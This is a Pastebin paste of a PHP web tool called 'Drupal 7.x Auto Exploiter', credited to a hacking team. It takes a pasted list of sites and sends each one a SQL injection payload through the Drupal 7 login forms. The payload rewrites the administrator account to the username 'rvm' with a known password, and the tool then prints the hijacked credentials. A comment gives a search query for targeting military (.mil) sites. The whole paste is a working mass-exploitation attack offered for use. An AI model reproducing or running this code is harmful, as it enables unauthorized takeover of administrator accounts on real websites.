API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 10th, 2017
138
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.11 KB | None | 0 0
raw download clone embed print report
  1. <html><title>Drupal 7.x Auto Exploiter</title>
  2. <body bgcolor="#000000">
  3. <font color='red'><pre><p><center>
  4. ==========================================================================================================
  5.  
  6. ===================================================================
  7. ___ ___ ___ _____
  8. / _ \ _ __ __ _ ___ / _ \ / _ \___ |
  9. | (_) | '_ \ / _` / __| | | | | | | | / /
  10. \__, | | | | (_| \__ \ | |_| | |_| |/ /
  11. /_/|_| |_|\__,_|___/ \___/ \___//_/
  12. hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
  13. uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu
  14. #Drupal Auto Exploiter
  15. #Coded by AnonGhostDZ-Team
  16. #Contact: fb ==> AnonGhostDZ-Team
  17. ______________________________________________________________
  18.  
  19. <pre>List Sites :</font><hre>
  20. <form method='POST'>
  21. <textarea name='sites' cols='45' rows='15'></textarea>
  22. <input type='submit' value='Exploit' /><br>
  23. </form>
  24. <?php
  25. /*
  26. Coded by rvm
  27. inurl:sites/default/files/ site:mil.**
  28. */
  29. error_reporting(0);
  30. $log = "/user/login";
  31. $url=explode("\r\n", $_POST['sites']);
  32. foreach ($url as $site) {
  33. $rvm = "/?q=user";
  34. $post_data = "name[0;update users set name %3D 'rvm' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  35. $params = array(
  36. 'http' => array(
  37. 'method' => 'POST',
  38. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  39. 'content' => $post_data
  40. )
  41. );
  42. $ctx = stream_context_create($params);
  43. $data = file_get_contents($site . '/user/login/', null, $ctx);
  44. echo "<font color=blue>Testing user/login $site <br>";
  45. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
  46. echo "<font color=green>User :rvm <br>Password :admin<br>";
  47. } else {
  48. echo "<font color=red>Not Vulnerable. <br>";
  49. }
  50. }
  51. $url=explode("\r\n", $_POST['sites']);
  52. foreach ($url as $site) {
  53. $post_data = "name[0;update users set name %3D 'rvm' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  54. $params = array(
  55. 'http' => array(
  56. 'method' => 'POST',
  57. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  58. 'content' => $post_data
  59. )
  60. );
  61. $ctx = stream_context_create($params);
  62. $data = file_get_contents($site . '?q=node&destination=node', null, $ctx);
  63. echo "<font color=blue>Testing at Index $site <br>";
  64. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  65. echo "<font color=green>User :rvm <br> Password :admin <br>";
  66.  
  67. } else {
  68. echo "<font color=red>Not Vulnerable. \n ";
  69. }
  70. }
  71. ?>
  72. </pre></p></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!